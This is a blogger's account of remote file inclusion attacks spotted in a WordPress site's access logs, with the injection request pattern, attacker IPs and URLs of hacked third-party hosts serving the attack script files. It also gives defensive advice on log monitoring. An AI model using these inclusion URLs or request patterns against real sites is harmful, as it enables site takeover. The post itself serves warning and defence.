Two days running… I post a link on Twitter and guess what? I immediately visit the stats page to review how the posting went and presto. I have two IPs visiting very strange “URLs” on my site? The view of their location read something like: my url followed by =http://www.americinn.com//email-images/images/AinuLid1.txt?? I changed the 1 to a 2 and found yet another file. Both were Perl injection attacks. Americinn was being used as a third party host. Sad thing, their site probably stores personal information in databases and or files so be wary if you are signing up online.
Anyway, following the Americinn url will take you to the classic die(“FeeLCoMz”); a standard injection attack. The first file did nothing but check for access points and flaws. The second page/file is the real problem. Whoever gathers this information can get into your site whenever they want access. Of course the host site is guilty of nothing more than being the host. I contacted both locations that contained the files. Kul has already removed the files. Hopefully they removed the “plug-ins” that allowed their site to be hacked as well as all passwords on the site. Links and more coming up –>
The biggest heads up I can give you is to keep a vigilant watch on your access logs. If you are under attack beware using FTP; Passwords are not encrypted. Check the date when your HTML and PHP files were modified.
Here are the two locations that hosted the files ran on my site:
http://www.americinn.com/
http://www.americinn.com//email-images/images/AinuLid1.txt??
http://www.americinn.com//email-images/images/AinuLid2.txt??
Visit at your own risk.
http://www.kul.pl/21.html
http://muzykologia.lublin.pl/templates/system/id1.txt
http://muzykologia.lublin.pl/templates/system/id2.txt
Visit at your own risk.
The trackback on this IP led me to this site: http://www.maruwakorea.com/technote7/board.php?board=maruwa.
Addendum: After the Twitter of this article we had a visit from 118.217.216.132 OASYSSTORY Intranet using www.howtolisten.kr and www.snusoft.ru as a host for their vile work. I am assuming I pissed some kid off posting on Twitter about the earlier hack. They tried something a little different, die(“Jatimcom”);. Pretty much the same type of attack. He/She was pretty relentless. Must be sitting on Twitter picking on sites that mention hackers, Oh well! He is helping out WordPress by finding security gaps and providing me with a few hits. =)
Access log just posted 8 more entries. Several were duplicates. You can view his IP and the sites where he is currently hosting his hack files:
118.217.216.132 – http://snusoft.ru//administrator/components/com_remository/id.txt?? Mozilla/5.0
118.217.216.132 – http://www.howtolisten.kr/lct/exam3/111/id1.txt???? Mozilla/5.0
Visit at your own risk.
Anybody have a fly swatter or a better hacker? I am all about Zen and Peace but… If we disappear offline for a few days, you will understand why. =) Are the kids in Korea that dang bored? Where are the internet police when you need them? As other dangerous IP’s pop-up, I will add them to the list. Feel free to share your “adventures.”
Stay alert and Happy Coding! Z
Tags: hack, PHP, spam, Theme, WordPress
Want Something Else?